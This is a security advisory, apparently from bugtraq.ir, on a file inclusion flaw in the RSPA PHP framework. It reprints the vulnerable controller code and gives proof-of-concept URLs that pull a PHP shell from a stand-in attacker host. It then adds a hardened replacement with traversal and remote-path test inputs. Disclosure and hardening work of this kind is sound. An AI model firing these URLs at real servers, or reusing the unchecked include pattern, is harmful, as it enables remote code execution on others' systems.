RSPA (Really Simple PHP and Ajax), PHP with HTML/Javascript:
http://rspa.sourceforge.net
Credit:
The information has been provided by Hamid Ebadi.
The original article can be found at: http://www.bugtraq.ir
http://www.bugtraq.ir/articles/advisory/RSPA_File_Inclusion/6
Vulnerable Systems:
Version: rspa-2007-03-23
Description:
Input passed to the "__IncludeFilePHPClass", "__ClassPath" and "__class" parameters in
"rspa/framework/Controller_v5.php" and "rspa/framework/Controller_v4.php" is not properly
verified before being used to include files. This can be exploited to execute arbitrary PHP
code by including files from local or external resources.
Vulnerable Code:
require_once("rspaconf.inc.php");
$className = $_REQUEST['__class'];
$methordName = $_REQUEST['__methord'];
// ClassFile + ClassPath
include ("../components/Form.class.php");
if ($_REQUEST["__ClassPath"]=="null" || empty($_REQUEST["__ClassPath"])){
    // __class from the request is concatenated into the path unchecked
    $filename = $RSPA['class_folder'].$className.$RSPA['class_extension'];
}else {
    // __ClassPath from the request becomes the start of the include path
    $filename = $_REQUEST["__ClassPath"].$className.$RSPA['class_extension'];
}
require_once($filename);
POC exploit:
The following URLs will cause remote file inclusion:
http://[HOST]/rspa/framework/Controller_v5.php?__IncludeFilePHPClass=http://phpshell.txt/?
http://[HOST]/rspa/framework/Controller_v4.php?__ClassPath=http://phpshell.txt/?
# copyright : http://www.bugtraq.ir
Parameters "__IncludeFilePHPClass", "__ClassPath" and "__class" in
"rspa/framework/Controller_v5.php" and "rspa/framework/Controller_v4.php" (PHP file inclusion).
See http://www.bugtraq.ir.
require_once("rspaconf.inc.php");
$className = $_REQUEST['__class'];
$methordName = $_REQUEST['__methord'];
// IncludeFile for PHP Class
if ($_REQUEST['__IncludeFilePHPClass']){
    // request parameter is used directly as the include target
    $filename = $_REQUEST['__IncludeFilePHPClass'];
    require_once ($filename);
}
// Parms
if (isset($_REQUEST['__parameters'])){$parameter = getParms($_REQUEST['__parameters']);}else{$parameter="";}
// ClassFile + ClassPath
include ("../components/Form.class.php");
if ($_REQUEST["__ClassPath"]=="null" || empty($_REQUEST["__ClassPath"])){
    // __class from the request is concatenated into the path unchecked
    $filename = $RSPA['class_folder'].$className.$RSPA['class_extension'];
}else {
    // __ClassPath from the request becomes the start of the include path
    $filename = $_REQUEST["__ClassPath"].$className.$RSPA['class_extension'];
}
require_once($filename);
http://[HOST]/rspa/framework/Controller_v5.php?__IncludeFilePHPClass=http://attacker/phpshell.txt/?
http://[HOST]/rspa/framework/Controller_v4.php?__ClassPath=http://attacker/phpshell.txt/?
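A hardened form of the include logic in the vulnerable code above, added here as an illustration; it is not RSPA's code or the advisory author's fix. The helper name rspa_resolve_class_file() is hypothetical, and the example assumes that $RSPA['class_folder'] ends with a directory separator and that no client legitimately needs to send __ClassPath or __IncludeFilePHPClass.

```php
<?php
// Added example, not RSPA code. rspa_resolve_class_file() is a hypothetical helper.
function rspa_resolve_class_file(array $conf, array $request): string
{
    // The include target is built from server-side configuration only:
    // a request that tries to supply a path or file is refused outright.
    foreach (['__IncludeFilePHPClass', '__ClassPath'] as $param) {
        $value = $request[$param] ?? '';
        if ($value !== '' && $value !== 'null') {
            throw new InvalidArgumentException("$param is not accepted");
        }
    }
    // __class must be a bare identifier: no slashes, dots, schemes or NUL bytes.
    $class = $request['__class'] ?? '';
    if (!is_string($class) || !preg_match('/\A[A-Za-z_][A-Za-z0-9_]{0,63}\z/', $class)) {
        throw new InvalidArgumentException('invalid __class');
    }
    // Resolve symlinks and confirm the file really sits under class_folder.
    $base = realpath($conf['class_folder']);
    $file = realpath($conf['class_folder'] . $class . $conf['class_extension']);
    if ($base === false || $file === false
        || strncmp($file, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new RuntimeException('class file not found under class_folder');
    }
    return $file;
}

// Constructed demo data: a throwaway class folder with one class file.
$dir = sys_get_temp_dir() . '/rspa_demo_' . bin2hex(random_bytes(4)) . '/';
mkdir($dir);
file_put_contents($dir . 'Demo.class.php', "<?php class Demo {}\n");
$conf = ['class_folder' => $dir, 'class_extension' => '.class.php'];

$cases = [
    'plain class name'     => ['__class' => 'Demo', '__ClassPath' => 'null'],
    'remote __ClassPath'   => ['__class' => 'Demo', '__ClassPath' => 'http://remote.example/x.txt/?'],
    'include-file param'   => ['__class' => 'Demo', '__IncludeFilePHPClass' => '/etc/passwd'],
    'traversal in __class' => ['__class' => '../../etc/passwd'],
];
foreach ($cases as $label => $request) {
    try {
        $result = 'include ' . basename(rspa_resolve_class_file($conf, $request));
    } catch (Exception $e) {
        $result = 'rejected: ' . $e->getMessage();
    }
    echo str_pad($label, 22), $result, PHP_EOL;
}
unlink($dir . 'Demo.class.php');
rmdir($dir);
```

In a controller, the returned path would be the only value passed to require_once; setting allow_url_include to Off in php.ini additionally blocks the remote (http://) variant at the interpreter level.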
# http://www.bugtraq.ir